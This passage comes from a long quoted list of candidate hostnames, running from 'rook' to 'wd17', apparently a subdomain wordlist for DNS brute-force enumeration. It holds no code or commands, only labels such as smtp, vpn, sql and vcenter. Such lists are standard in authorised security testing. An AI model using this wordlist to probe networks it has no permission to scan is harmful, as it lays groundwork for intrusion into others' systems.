"rook", "room", "rooster", "root", "rootd", "rooted", "rosa", "rosalind", "rose", "rosebud", "rosemary", "rosetta", "rosie", "ross", "rossi", "rossini", "rouge", "route", "router", "router-e0", "router-i", "router-i0", "router-s0", "router-via-ctc", "router01", "router02", "router1", "router2", "router3", "router4", "router5", "routeur", "rover", "rowan", "rowlf", "roy", "royal", "rp", "rpc", "rplay", "rpm", "rproxy", "rps", "rptp", "rq", "rr", "rr1", "rr2", "rs", "rs01", "rs1", "rs2", "rs3", "rs4", "rsa", "rsc", "rsm", "rss", "rsync", "rt", "rt0", "rt01", "rt1", "rt2", "rt3", "rt4", "rtc", "rtelnet", "rtmp", "rtr", "rtr01", "rtr1", "rtr1-e0", "rtr2", "rts", "rtsp", "ru", "rubens", "rubicon", "rubidium", "rubin", "ruby", "rudi", "rufus", "rum", "rumba", "run", "rune", "runko-gw", "runner", "rupert", "rush", "russell", "rusty", "ruth", "ruthenium", "rutherford", "rv", "rw", "rwhois", "rx", "rx1", "ry", "ryan", "rye", "rz", "s", "s-0", "s0", "s0-0", "s0-1", "s00", "s01", "s02", "s03", "s04", "s05", "s06", "s07", "s08", "s09", "s1", "s1-0", "s1-1", "s10", "s11", "s12", "s13", "s14", "s15", "s16", "s17", "s18", "s19", "s2", "s2-0", "s20", "s21", "s22", "s23", "s24", "s25", "s26", "s27", "s28", "s29", "s2k-1", "s3", "s30", "s31", "s32", "s33", "s34", "s35", "s36", "s37", "s38", "s39", "s4", "s40", "s41", "s42", "s43", "s44", "s45", "s46", "s47", "s48", "s49", "s5", "s50", "s51", "s52", "s53", "s54", "s55", "s56", "s57", "s58", "s59", "s6", "s60", "s61", "s62", "s63", "s64", "s65", "s66", "s67", "s68", "s69", "s7", "s70", "s71", "s72", "s73", "s74", "s75", "s76", "s77", "s78", "s79", "s8", "s80", "s81", "s82", "s83", "s84", "s85", "s86", "s87", "s88", "s89", "s9", "s90", "s91", "s92", "s93", "s94", "s95", "s96", "s97", "s98", "s99", "sa", "sa1", "sa2", "saas", "saba", "saber", "sable", "sabre", "sabrina", "sac", "sack", "sacramento", "sad", "sadmin", "safari", "safe", "safety", "saffron", "saft", "saga", "sagan", "sage", "sagitta", "sagittarius", "sahara", "said", 
"sail", "saint", "saiph", "sakai", "sake", "sakura", "sal", "salamander", "sale", "salem", "sales", "sally", "salmon", "salsa", "salt", "saltlake", "sam", "samantha", "samara", "samarium", "samba", "sametime", "sammy", "samoa", "sample", "samples", "samson", "samsung", "samuel", "samurai", "samwise", "san", "san1", "san2", "sanantonio", "sand", "sandbox", "sandiego", "sandman", "sandra", "sandy", "sane", "sanfrancisco", "sanjose", "santa", "santana", "santiago", "sap", "sapgw", "saphir", "sapphire", "saprouter", "sar", "sara", "sarah", "saratoga", "sareplus", "saruman", "sas", "sasha", "saskatchewan", "sat", "satan", "satellite", "saturn", "saturne", "saturno", "sauron", "sav", "savage", "save", "saw", "say", "sb", "sb1", "sb2", "sbc", "sbc1", "sbs", "sbs1", "sbserver", "sc", "sc0", "sc1", "sc2", "sc3", "scache1", "scala", "scale", "scalix", "scan", "scan1", "scan2", "scandium", "scanner", "scanner01", "scarlet", "scc", "sccm", "schedule", "schedules", "schmidt", "schneider", "scholar", "school", "schools", "schroeder", "schubert", "sci", "science", "scissors", "scm", "sco", "scooby", "scoop", "scooter", "scope", "score", "scores", "scorpio", "scorpion", "scorpius", "scotland", "scott", "scotty", "scout", "scp", "scratch", "scratchy", "screen", "screw", "scribe", "script", "scripts", "scrooge", "scs", "scully", "sculptor", "scutum", "scylla", "sd", "sd-gw", "sd1", "sd2", "sdc", "sdp1", "sds", "sdsl", "se", "se1", "se1-0", "sea", "seagull", "seahorse", "seal", "sean", "search", "search1", "search2", "search6", "seat", "seattle", "sebastian", "sec", "sec1", "sec2", "secmail", "second", "secondary", "secondary-router", "secret", "secretaria", "secretary", "section", "secure", "secure1", "secure2", "secure3", "secure4", "secure5", "secured", "secureftp", "securemail", "securid", "security", "sedna", "see", "seed", "seek", "seeweb-gw", "seguro", "sekretariat", "sel", "select", "selene", "selenium", "self", "selfservice", "selma", "sem", "seminar", "sems", "sen", "send", 
"send1", "send2", "sender", "sendmail", "seneca", "senior", "senna", "sense", "sensible", "sensor", "sentinel", "sentry", "seo", "seoul", "sep", "separate", "sequoia", "ser", "ser0", "ser1", "seraph", "serena", "serenity", "sergio", "seri", "serial", "serial0", "serial0-0", "serial0-1", "serial1-0", "serial2-0", "serial3-0", "serious", "serpens", "serv", "serv01", "serv02", "serv1", "serv2", "serv3", "serv4", "serv5", "serval", "serve", "server", "server-1", "server-2", "server0", "server01", "server02", "server03", "server04", "server05", "server06", "server07", "server08", "server09", "server1", "server10", "server11", "server12", "server13", "server14", "server15", "server16", "server17", "server18", "server19", "server2", "server20", "server21", "server22", "server23", "server24", "server25", "server26", "server27", "server28", "server29", "server3", "server30", "server31", "server32", "server33", "server34", "server35", "server36", "server37", "server38", "server39", "server4", "server40", "server41", "server42", "server43", "server44", "server45", "server46", "server47", "server48", "server49", "server5", "server50", "server51", "server52", "server53", "server54", "server55", "server56", "server57", "server6", "server60", "server7", "server8", "server9", "servermail", "servers", "serveur", "serveur1", "service", "service1", "service2", "service3", "servicedesk", "services", "services1", "services2", "servicio", "servicios", "servidor", "servidor1", "servidor2", "servis", "servizi", "serwer", "ses", "sesame", "session", "set", "seth", "setup", "seurat", "seven", "sex", "seymour", "sf", "sf1", "sf2", "sfa", "sfs", "sft", "sftp", "sfx", "sg", "sg1", "sg2", "sgi", "sgs", "sgw", "sh", "sh1", "sh2", "sha", "shade", "shadow", "shadowfax", "shaggy", "shake", "shaman", "shanghai", "shannon", "shape", "shaper", "share", "shared", "shared1", "sharepoint", "shareware", "shark", "sharon", "sharp", "shasta", "shaun", "shaw", "sheep", "sheet", "shelby", "sheldon", "shell", 
"shell1", "shelley", "shells", "shelob", "shemp", "sherlock", "sherman", "sherry", "shib", "shibboleth", "shield", "shift", "shine", "ship", "shipping", "shiraz", "shire", "shirley", "shiva", "shock", "shop", "shop1", "shop2", "shoppers", "shopping", "shorty", "show", "shrek", "shrike", "shrimp", "shs", "shu", "shuttle", "si", "sia", "sibelius", "sic", "sid", "sidn2", "siebel", "siemens", "sienna", "sierra", "sieve", "sif", "sig", "siga", "sight", "sigma", "sign", "signal", "signin", "signup", "sil", "silc", "silent", "silicon", "silk", "silo", "silver", "silvia", "sim", "simba", "simon", "simone", "simple", "simpson", "sims", "sin", "single", "sink", "sinope", "sioux", "sip", "sip-tls", "sip01", "sip1", "sip2", "sip3", "sir", "siren", "sirio", "sirius", "sis", "sisko", "sistemas", "sister", "sisyphus", "sit", "site", "site1", "sitebuilder", "sites", "six", "sixxs", "sixxs-gw", "sj", "sk", "skadi", "skate", "skill", "skinner", "skipper", "skippy", "skkserv", "sklep", "skuld", "skunk", "sky", "skye", "skylark", "skyline", "skynet", "skywalker", "skyward", "sl", "sl1", "sla", "slackware", "slash", "slate", "slave", "slave1", "slave2", "slc", "sleep", "sleepy", "sleet", "slice", "slim", "slip", "slis", "slmail", "sloth", "slow", "slug", "sm", "sm1", "sm2", "sm3", "sma", "sma1", "smail", "smail01", "small", "smart", "smarthost", "smaug", "smb", "smc", "sme", "smeagol", "smf", "smg", "smile", "smith", "smithers", "sml", "smoke", "smokeping", "smokey", "smooth", "smp", "sms", "sms1", "sms2", "smsqp", "smt", "smtp", "smtp-01", "smtp-1", "smtp-2", "smtp-gw", "smtp-in", "smtp-out", "smtp-out1", "smtp-out2", "smtp-relay", "smtp0", "smtp01", "smtp02", "smtp03", "smtp04", "smtp05", "smtp06", "smtp07", "smtp08", "smtp09", "smtp1", "smtp10", "smtp11", "smtp12", "smtp13", "smtp14", "smtp15", "smtp16", "smtp17", "smtp18", "smtp19", "smtp2", "smtp20", "smtp21", "smtp22", "smtp23", "smtp24", "smtp25", "smtp26", "smtp27", "smtp28", "smtp29", "smtp3", "smtp30", "smtp31", "smtp32", 
"smtp33", "smtp34", "smtp35", "smtp36", "smtp37", "smtp38", "smtp39", "smtp4", "smtp40", "smtp41", "smtp42", "smtp43", "smtp44", "smtp45", "smtp46", "smtp47", "smtp48", "smtp49", "smtp5", "smtp50", "smtp51", "smtp52", "smtp53", "smtp54", "smtp55", "smtp56", "smtp57", "smtp58", "smtp59", "smtp6", "smtp60", "smtp61", "smtp62", "smtp63", "smtp64", "smtp65", "smtp66", "smtp67", "smtp68", "smtp69", "smtp7", "smtp70", "smtp71", "smtp72", "smtp73", "smtp74", "smtp75", "smtp76", "smtp77", "smtp78", "smtp79", "smtp8", "smtp80", "smtp81", "smtp82", "smtp83", "smtp84", "smtp85", "smtp86", "smtp87", "smtp88", "smtp89", "smtp9", "smtp90", "smtp91", "smtp92", "smtp93", "smtp94", "smtp95", "smtp96", "smtp97", "smtp98", "smtp99", "smtpa", "smtpauth", "smtpgate", "smtpgw", "smtpgw2", "smtphost", "smtpin", "smtpmail", "smtpmailer", "smtpout", "smtpout1", "smtpout2", "smtprelay", "smtps", "smurf", "smux", "sn", "snail", "snake", "snap", "snapper", "sndr1", "sndr2", "sndv-pts01", "sndv-pts02", "sndv-pts03", "sndv-pts04", "sneezy", "sniffer", "snipe", "sniper", "snmp", "snmp-trap", "snmpd", "snoopy", "snort", "snow", "snowball", "snowwhite", "snowy", "snpp", "sns", "so", "so-0-0-0", "so-0-0-1", "so-0-1-0", "so-1-0-0", "so-2-0-0", "soa", "soap", "sobek", "soc", "socal", "social", "society", "socios", "socks", "socrates", "soda", "sodium", "sofia", "soft", "software", "sogo", "soho", "sokrates", "sol", "solar", "solaris", "solarwinds", "sole", "soleil", "solid", "soliton", "solo", "solomon", "solr", "solstice", "solution", "solutions", "soma", "some", "something", "son", "sonar", "sonata", "song", "songs", "sonia", "sonic", "sonicwall", "sonne", "sonny", "sony", "sophia", "sophie", "sophos", "soporte", "sorry", "sort", "sos", "soul", "sound", "soup", "sour", "source", "sourcecode", "sourcesafe", "south", "southcarolina", "southdakota", "southeast", "southwest", "sp", "sp-pod", "sp-pod2", "sp0", "sp01", "sp1", "sp2", "sp3", "spa", "space", "spacewalk", "spade", "spain", "spam", "spam1", 
"spam2", "spamd", "spamfilter", "spamtitan", "spamwall", "spanky", "sparc", "spare", "spare1", "spare2", "spare3", "spark", "sparkle", "sparks", "sparky", "sparrow", "sparta", "spartacus", "spartan", "spawn", "spb", "spc", "special", "spectra", "spectra01", "spectra02", "spectre", "spectrum", "speech", "speed", "speedtest", "speedy", "spencer", "sphere", "sphinx", "spica", "spice", "spider", "spiderman", "spike", "spin", "spinner", "spiral", "spirit", "spitfire", "spl", "splash", "splendid", "splinter", "splunk", "spm", "spock", "spokane", "sponcer", "sponge", "spongebob", "spooky", "spool", "spoon", "sport", "sports", "spot", "spring", "springfield", "sprint", "sprite", "sprocket", "spruce", "sps", "spss", "spud", "sputnik", "spy", "sq", "sqa", "sql", "sql0", "sql01", "sql02", "sql1", "sql2", "sql3", "sql4", "sql7", "sqlserver", "sqlsvr", "sqlsvr2", "squall", "square", "squash", "squid", "squid1", "squirrel", "squirrelmail", "sr", "sr01", "sr1", "sr2", "src", "srm", "srp1-0", "srp1-1", "srs", "srv", "srv-mail", "srv0", "srv01", "srv02", "srv03", "srv04", "srv05", "srv06", "srv07", "srv08", "srv09", "srv1", "srv10", "srv11", "srv12", "srv13", "srv14", "srv15", "srv16", "srv17", "srv18", "srv19", "srv1a", "srv2", "srv20", "srv21", "srv22", "srv23", "srv24", "srv25", "srv26", "srv27", "srv28", "srv29", "srv3", "srv30", "srv4", "srv5", "srv6", "srv7", "srv8", "srv9", "srvmail", "ss", "ss1", "ss2", "ssa", "ssb", "ssc", "ssd", "ssh", "ssh1", "ssh2", "ssl", "ssl-vpn", "ssl0", "ssl01", "ssl1", "ssl2", "ssl3", "ssl4", "sslbk", "sslvpn", "ssmtp", "sso", "ssp", "sss", "st", "st01", "st1", "st2", "st3", "st4", "sta", "stable", "stack", "staff", "staff1", "staff2", "stage", "stage01", "stage1", "stage2", "staging", "staging1", "staging2", "stalker", "stamp", "stan", "stand", "standard", "standby", "stanley", "star", "star-gw", "star2", "starbuck", "stardust", "starfish", "stargate", "stargazer", "stark", "starlight", "starling", "stars", "starscream", "start", "stat", "stat1", 
"state", "static", "static1", "static10", "static11", "static12", "static13", "static15", "static2", "static3", "static4", "static5", "static54", "static6", "static7", "static8", "static9", "station", "station1", "station10", "station11", "station12", "station13", "station14", "station15", "station16", "station17", "station18", "station19", "station2", "station20", "station21", "station22", "station23", "station24", "station25", "station26", "station27", "station28", "station29", "station3", "station30", "station31", "station32", "station33", "station34", "station35", "station36", "station37", "station38", "station39", "station4", "station40", "station41", "station42", "station43", "station44", "station45", "station46", "station47", "station48", "station49", "station5", "station50", "station51", "station52", "station53", "station54", "station55", "station56", "station57", "station58", "station59", "station6", "station60", "station61", "station62", "station63", "station64", "station65", "station66", "station67", "station68", "station69", "station7", "station70", "station71", "station72", "station73", "station74", "station75", "station76", "station77", "station78", "station79", "station8", "station80", "station81", "station82", "station83", "station84", "station85", "station86", "station87", "station88", "station89", "station9", "station90", "station91", "station92", "station93", "station94", "station95", "station96", "station97", "station98", "station99", "statistics", "statistik", "statler", "stats", "stats1", "stats2", "status", "stc", "std", "steady", "stealth", "steam", "steel", "stefan", "stein", "stella", "stem", "step", "stephen", "sterling", "stern", "steve", "steven", "stewart", "stewie", "stg", "sti", "stick", "still", "stimpy", "sting", "stinger", "stingray", "stinky", "stitch", "stlouis", "stm", "sto-cr1", "sto-cr2", "sto-cr3", "stock", "stockholm", "stokes", "stone", "stop", "storage", "storage01", "storage1", "storage2", "store", "store1", "store2", 
"storefront", "stores", "stork", "storm", "story", "stout", "str", "straight", "strange", "strategy", "stratus", "strauss", "strawberry", "stream", "stream01", "stream1", "stream2", "stream3", "stream4", "stream5", "streamdb", "streamdb2", "streamer", "streaming", "streams", "street", "strength", "stress", "stretch", "strider", "string", "strong", "stronghold", "strongmail", "strontium", "structure", "sts", "sts1", "sts2", "sts3", "stu", "stuart", "stud", "student", "student1", "student2", "student3", "student4", "students", "studio", "study", "stuff", "stun", "stuttgart", "style", "styx", "su", "sub", "sub1", "sub2", "subaru", "subject", "sublocalnode", "submission", "submit", "subnet", "subscribe", "subversion", "success", "successful", "suche", "sudo", "sue", "sufficient", "sugar", "sulfur", "sullivan", "sulu", "sumatra", "summer", "summit", "sun", "sun0", "sun01", "sun02", "sun1", "sun2", "sun3", "sunfire", "sunfish", "sunflower", "sunlight", "sunny", "sunray", "sunrise", "sunrpc", "sunset", "sunshine", "sunspot", "sup", "supdup", "super", "superior", "superman", "supernova", "superstar", "supervision", "supfiledbg", "supfilesrv", "suporte", "supplier", "suppliers", "supply", "support", "support-1", "support-2", "support1", "support2", "support3", "supra", "supreme", "sur01", "sure", "surf", "surface", "surfer", "surprise", "survey", "surveyor", "surveys", "surya", "sus", "susan", "suse", "sushi", "susi", "suucp", "suzuki", "sv", "sv01", "sv02", "sv03", "sv04", "sv1", "sv10", "sv11", "sv2", "sv3", "sv4", "sv5", "sv6", "sv7", "svc", "sven", "svn", "svr", "svr01", "svr02", "svr1", "svr2", "svr3", "svr4", "svr5", "sw", "sw-1", "sw-core1", "sw0", "sw01", "sw02", "sw03", "sw04", "sw1", "sw10", "sw11", "sw2", "sw3", "sw4", "sw5", "sw6", "sw7", "sw8", "swallow", "swan", "swat", "sweden", "sweet", "swg", "swg-proxy", "swift", "swim", "swing", "swis", "swiss", "switch", "switch0", "switch01", "switch02", "switch1", "switch2", "switch3", "switch4", "switch5", "switch6", 
"switch7", "switzerland", "sword", "swordfish", "sx", "sy", "sybase", "sycamore", "syd", "sydney", "syllabus", "sylvester", "sylvia", "symbol", "sympa", "symphony", "syn", "synapse", "sync", "synergy", "syntax", "sys", "sys1", "sys2", "sys3", "sys4", "sys5", "sysadmin", "sysback", "syslog", "syslog1", "syslogs", "sysmon", "sysrqd", "systat", "system", "system1", "system2", "system3", "systems", "sz", "szerver1", "szerver2", "szerver3", "szerver4", "szerver5", "t", "t0", "t1", "t10", "t11", "t2", "t20", "t3", "t4", "t5", "t6", "t7", "t8", "ta", "table", "tablet", "tac", "tacacs", "tacacs-ds", "tachyon", "taco", "tacoma", "tag", "tahiti", "tahoe", "tai", "tail", "taiwan", "take", "talent", "talisker", "talk", "tall", "talon", "talos", "tam", "tama", "tamara", "tampa", "tan", "tandberg", "tandem", "tang", "tangent", "tangerine", "tango", "tank", "tantalum", "tanya", "tao", "tap", "tape", "tar", "tara", "tarantula", "tardis", "target", "tarsier", "tartarus", "tarzan", "tas", "task", "tatooine", "tau", "taurus", "tax", "taylor", "taz", "tb", "tc", "tc1", "tc2", "tcl", "tcpmux", "tcs", "td", "te", "te-1-1", "te-1-2", "te-1-3", "te-2-1", "te-2-2", "te-3-1", "te0-1", "te1-1", "te1-2", "te1-3", "te1-4", "te2-1", "te2-2", "te2-3", "te2-4", "te3-1", "te3-2", "te3-3", "te3-4", "te4-1", "te4-2", "te4-3", "te4-4", "te7-1", "te7-2", "te8-1", "tea", "teach", "teacher", "teaching", "teak", "teal", "team", "teams", "teamspeak", "tec", "tech", "tech1", "tech2", "techno", "technology", "techsupport", "ted", "teddy", "tek", "tel", "tele", "telecom", "telephone", "telephony", "telesto", "television", "telhosting", "tellurium", "tellus", "telnet", "telnets", "tem", "temp", "temp1", "temp2", "temp3", "temp4", "temp5", "tempest", "template", "temple", "tempo", "tempus", "tempus1", "ten", "ten01", "ten02", "ten03", "ten1-0-0", "ten1-1", "ten1-49", "tengig1-1", "tennessee", "tenngig1-49", "tennis", "tense", "tequila", "tera", "teredo", "teredo-gw", "teredo-relay", "teresa", "term", "term1", 
"term2", "terminal", "terminalserver", "terminator", "terminus", "termserv", "terra", "terror", "terry", "tesla", "test", "test-www", "test0", "test01", "test02", "test03", "test04", "test1", "test10", "test11", "test12", "test2", "test2k", "test3", "test4", "test5", "test6", "test6www", "test7", "test8", "test9", "testajax", "testasp", "testaspnet", "testbed", "testbox", "testcf", "teste", "tester", "testing", "testip6", "testipv6", "testjsp", "testlab", "testlinux", "testmail", "testpc", "testphp", "testportal", "testserver", "testsite", "testsql", "testweb", "testwww", "testxp", "tethys", "tetra", "tex", "texas", "text", "tf", "tfido", "tfs", "tftp", "tftp1", "tg", "tge-1-1", "tge1-1", "tge17-10", "tge18-10", "tge7-1", "tge7-2", "tge8-1", "tge8-2", "tge8-3", "tge8-4", "tge8-5", "tge9-1", "tge9-2", "tge9-3", "tge9-4", "th", "thailand", "thalassa", "thales", "thalia", "thallium", "thames", "thanatos", "thankful", "that", "the", "thebe", "theia", "themis", "theo", "theoden", "theory", "thermo", "theseus", "theta", "thetis", "thewall", "thick", "thing", "think", "thinkpad", "thinktank", "this", "thistle", "thomas", "thompson", "thomson", "thor", "thorin", "thorium", "thot", "thoth", "thread", "three", "thrill", "thumper", "thunder", "thunderbird", "thunderbolt", "thyme", "ti", "tiamat", "tiberius", "tic", "tick", "ticket", "tickets", "tide", "tienda", "tiger", "tigger", "tigre", "tigris", "tilt", "tim", "time", "time-clock", "time1", "time2", "timeclock", "timed", "timesheet", "timmy", "timon", "tin", "tina", "tinc", "tintin", "tiny", "tip", "tis", "titan", "titan2", "titania", "titanic", "titanium", "title", "titus", "tivoli", "tj", "tk", "tl", "tla-dslam1", "tlc", "tls", "tm", "tm1", "tmail", "tmg", "tmp", "tms", "tn", "tns", "tnt", "tnt1", "tnt2", "tnt3", "tnt4", "tnt5", "tnt6", "to", "toad", "toast", "toaster", "toby", "tock", "today", "todd", "toe", "token", "tokyo", "toledo", "tom", "tomas", "tomato", "tomcat", "tommy", "tomocha", "tone", "tonga", "tony", 
"tool", "tool1", "toolbox", "tools", "top", "top1", "topaz", "topic", "toplayer", "tor", "torch", "tori", "torino", "tornado", "toro", "toronto", "torrent", "torres", "tosca", "toshiba", "total", "toto", "totoro", "toucan", "touch", "tour", "tower", "town", "toy", "toyota", "tp", "tproxy", "tps", "tq", "tr", "tr1", "tra", "trac", "trace", "trace2", "tracer", "track", "tracker", "tracker0", "tracking", "trackit", "tracy", "trade", "trading", "traffic", "train", "trainer", "training", "trans", "trans1", "transfer", "transfers", "transform", "transit", "translate", "transport", "trantor", "trap", "travel", "traveler", "tree", "trek", "trend", "trex", "tri", "trial", "triangle", "trick", "trident", "trigger", "trillian", "trinidad", "trinity", "trio", "trip", "tristan", "triton", "triumph", "trixbox", "trn1-iana", "trogdor", "troi", "troll", "tron", "troubadix", "trouble", "trout", "troy", "truck", "true", "trumpet", "trust", "truth", "try", "ts", "ts-01", "ts01", "ts02", "ts03", "ts1", "ts1-e0", "ts2", "ts3", "ts4", "ts5", "ts6", "tsa", "tse", "tserv1", "tserver", "tsg", "tsm", "tss", "tst", "tsunami", "tsv01", "tsv02", "tsweb", "tt", "ttc", "tts", "tu", "tu-0", "tu0", "tu1", "tu2", "tu3", "tu5", "tuba", "tube", "tucana", "tucker", "tucows", "tucson", "tulip", "tulsa", "tun0", "tuna", "tundra", "tungsten", "tunnel", "tunnel1", "tunnel2", "tunnelbroker", "turbo", "turin", "turing", "turkey", "turn", "turner", "turquoise", "turtle", "tutor", "tutortrac", "tuvok", "tux", "tv", "tv1", "tw", "twcc", "tweety", "twenty", "twiki", "twilight", "twin", "twins", "twist", "twister", "two", "tx", "tx1", "ty", "tyche", "tycho", "tyler", "typhon", "typhoon", "typo3", "tyr", "tz", "u", "u1", "u10", "u11", "u12", "u13", "u14", "u15", "u16", "u17", "u18", "u19", "u2", "u20", "u21", "u22", "u23", "u24", "u25", "u26", "u27", "u28", "u29", "u3", "u30", "u31", "u32", "u33", "u34", "u35", "u36", "u37", "u38", "u39", "u4", "u40", "u41", "u42", "u43", "u44", "u45", "u46", "u47", "u48", "u49", 
"u5", "u50", "u51", "u52", "u53", "u54", "u55", "u56", "u57", "u58", "u59", "u6", "u60", "u61", "u62", "u63", "u64", "u65", "u66", "u67", "u68", "u69", "u7", "u70", "u71", "u72", "u73", "u74", "u75", "u76", "u77", "u78", "u79", "u8", "u80", "u81", "u82", "u83", "u84", "u85", "u86", "u87", "u88", "u89", "u9", "u90", "u91", "u92", "u93", "u94", "u95", "u96", "u97", "u98", "u99", "ua", "uag", "uat", "uat2", "ub", "ubr01", "ubuntu", "uc", "ud", "uddi", "ue", "ueqam01a", "ueqam01b", "uer01", "uer02", "uf", "ufo", "ug", "uh", "uhf", "uhura", "ui", "uj", "uk", "uk1", "uk2", "ul", "ulistserv", "ultimate", "ultra", "ultracopier", "ulysse", "ulysses", "um", "umbriel", "ums", "un", "unallocated", "unassigned", "uncritical", "undernet-gw", "uni", "unicorn", "uniform", "union", "unique", "unit", "united", "unitedkingdom", "unitedstates", "unity", "universal", "universe", "university", "unix", "unixware", "unknown", "uno", "untrust", "unused", "unused-ip", "unusual", "uo", "up", "up0-dc", "up1-dc", "update", "updates", "upgrade", "uplink", "upload", "uploads", "upp-cr1", "ups", "ups0", "ups01", "ups1", "ups2", "ups3", "upsilon", "uq", "ur", "ur01", "ur02", "ur03", "ur04", "ural", "uran", "urania", "uranium", "urano", "uranos", "uranus", "urban", "urchin", "urd", "ursa", "ursula", "ursus", "us", "us1", "us2", "us3", "usa", "use", "useful", "usenet", "user", "user-pc", "user1", "user10", "user11", "user12", "user13", "user14", "user15", "user16", "user17", "user18", "user19", "user2", "user20", "user21", "user22", "user23", "user24", "user25", "user26", "user27", "user28", "user29", "user3", "user30", "user31", "user32", "user33", "user34", "user35", "user36", "user37", "user38", "user39", "user4", "user40", "user41", "user42", "user43", "user44", "user45", "user46", "user47", "user48", "user49", "user5", "user50", "user51", "user52", "user53", "user54", "user55", "user56", "user57", "user58", "user59", "user6", "user60", "user61", "user62", "user63", "user64", "user65", "user66", 
"user67", "user68", "user69", "user7", "user70", "user71", "user72", "user73", "user74", "user75", "user76", "user77", "user78", "user79", "user8", "user80", "user81", "user82", "user83", "user84", "user85", "user86", "user87", "user88", "user89", "user9", "user90", "user91", "user92", "user93", "user94", "user95", "user96", "user97", "user98", "user99", "users", "usr", "usr1", "usv01", "ut", "utah", "util", "util1", "utilities", "utility", "utm", "utopia", "uu", "uucp", "uucp-path", "uunet-gw", "uv", "uw", "ux", "uy", "uz", "v", "v0", "v01", "v1", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19", "v2", "v20", "v21", "v22", "v23", "v25", "v27", "v3", "v32", "v4", "v5", "v50", "v6", "v6gw", "v6www", "v7", "v8", "v9", "va", "vaak", "vab-core-1", "vab2-core-1", "vacant", "vader", "vaio", "val", "valencia", "valhalla", "vali", "valiant", "valinor", "valkyrie", "valuable", "value", "vampire", "van", "vanadium", "vancouver", "vanessa", "vangogh", "vanguard", "vanilla", "vantive", "vapor", "var", "vas", "vault", "vb", "vboxd", "vc", "vc01", "vc1", "vc2", "vcenter", "vci", "vci2", "vcma", "vconf", "vcs", "vcse", "vd", "vdi", "vdr", "vds", "vds1", "vds2", "ve", "ve1", "ve10", "ve11", "ve12", "ve15", "ve2", "ve3", "ve30", "ve5", "ve8", "vector", "vectra", "vega", "vegas", "vela", "velocity", "vend", "vending", "vendor", "vendors", "venere", "venice", "venom", "ventas", "venus", "venus2", "vera", "verde", "verdi", "verify", "veritas", "vermeer", "vermont", "verona", "veronica", "vertigo", "verwaltung", "very", "vespa", "vespa1", "vesta", "vf", "vg", "vgate", "vgw", "vh", "vh1", "vh2", "vhf", "vhost", "vhost1", "vhost2", "vhost3", "vhost4", "vhosts", "vi", "via", "vic", "vicky", "victor", "victoria", "victory", "vid", "vidar", "vidconf", "video", "video1", "video2", "video3", "video6", "videoconf", "videoconference", "videos", "videoserver", "vienna", "view", "vig", "viking", "village", "vincent", "viola", "violet", "violin", "vip", "vip00", "vip01", 
"vip02", "vip03", "vip04", "vip05", "vip06", "vip07", "vip08", "vip09", "vip1", "vip10", "vip11", "vip12", "vip13", "vip14", "vip15", "vip16", "vip17", "vip18", "vip19", "vip2", "vip20", "vip21", "vip22", "vip23", "vip24", "vip25", "vip26", "vip27", "vip28", "vip29", "vip3", "vip30", "vip31", "vip32", "vip33", "vip34", "vip35", "vip36", "vip37", "vip38", "vip39", "viper", "vipgw", "vir", "virgil", "virginia", "virgo", "virt", "virt1", "virt2", "virtual", "virtual-circuit", "virtual-circuit2", "virtual1", "virtual2", "virtual3", "virus", "viruswall", "vis", "visa", "vishnu", "visio", "vision", "visit", "visitor", "visitor1", "vista", "visual", "vita", "vital", "viva", "vivaldi", "vivian", "vj", "vk", "vks", "vl", "vl-2", "vl-6", "vl1", "vl10", "vl100", "vl101", "vl102", "vl11", "vl12", "vl2", "vl20", "vl3", "vl31", "vl4", "vl5", "vl50", "vl6", "vl6-at", "vl7", "vlad", "vladimir", "vlan", "vlan-100", "vlan1", "vlan10", "vlan100", "vlan101", "vlan11", "vlan12", "vlan13", "vlan2", "vlan20", "vlan21", "vlan3", "vlan4", "vlan40", "vlan5", "vlan50", "vlan6", "vlan7", "vlan8", "vlan9", "vle", "vm", "vm0", "vm01", "vm02", "vm03", "vm04", "vm05", "vm06", "vm07", "vm1", "vm10", "vm11", "vm12", "vm13", "vm14", "vm2", "vm3", "vm4", "vm5", "vm6", "vm7", "vm8", "vm9", "vma", "vmail", "vmhost", "vmhost01", "vmhost1", "vmm", "vms", "vms1", "vmserver", "vmtest", "vmware", "vmware1", "vmware2", "vmware3", "vn", "vnc", "vnetd", "vo", "vod", "vodka", "voice", "voicemail", "void", "voip", "voip-gw", "voip01", "voip1", "voip2", "voip3", "voip4", "voipsys", "voipsys2", "voir", "volans", "volcano", "volga", "volt", "volta", "voltaire", "volume", "volvo", "voodoo", "vopied", "vortex", "vostok", "vote", "vox", "voyage", "voyager", "vp", "vpi", "vpi2", "vpn", "vpn-1", "vpn-2", "vpn-gw", "vpn0", "vpn01", "vpn02", "vpn03", "vpn04", "vpn05", "vpn06", "vpn1", "vpn10", "vpn11", "vpn12", "vpn13", "vpn14", "vpn15", "vpn16", "vpn17", "vpn18", "vpn19", "vpn2", "vpn20", "vpn21", "vpn22", "vpn23", 
"vpn24", "vpn25", "vpn26", "vpn28", "vpn3", "vpn30", "vpn4", "vpn5", "vpn6", "vpn7", "vpn8", "vpn9", "vpngate", "vpngw", "vpnserver", "vpnssl", "vpntest", "vps", "vps01", "vps02", "vps03", "vps1", "vps10", "vps11", "vps12", "vps2", "vps3", "vps4", "vps5", "vps6", "vps7", "vps8", "vps9", "vq", "vr", "vr1", "vrrp", "vs", "vs01", "vs02", "vs1", "vs2", "vs3", "vs4", "vs5", "vserv", "vserver", "vserver1", "vserver2", "vsp", "vsphere", "vss", "vt", "vtc", "vu", "vulcan", "vulcano", "vulture", "vv", "vw", "vweb", "vwww01", "vx", "vy", "vz", "vz1", "vz2", "w", "w-03", "w-04", "w0", "w01", "w02", "w03", "w1", "w10", "w11", "w12", "w13", "w14", "w15", "w16", "w17", "w18", "w19", "w2", "w20", "w21", "w22", "w23", "w24", "w25", "w26", "w27", "w28", "w2k3", "w3", "w31", "w32", "w35", "w3cache", "w4", "w5", "w6", "w7", "w8", "w9", "wa", "wagner", "wais", "waldo", "waldorf", "walk", "walker", "wall", "wallaby", "wallace", "wallet", "wally", "walnut", "walrus", "walter", "wam", "wan", "wan1", "wan2", "wanda", "wang", "wap", "wap1", "wap2", "war", "ward", "warehouse", "warhol", "warlock", "warlord", "warp", "warren", "warrior", "warsaw", "warthog", "was", "wasabi", "wash", "washington", "wasp", "watch", "watchdog", "watcher", "water", "watson", "watt", "wave", "waves", "wax", "way", "wayne", "wb", "wbm0", "wbm1", "wc", "wc3", "wcs", "wd", "wd1", "wd10", "wd11", "wd12", "wd13", "wd14", "wd15", "wd16", "wd17", 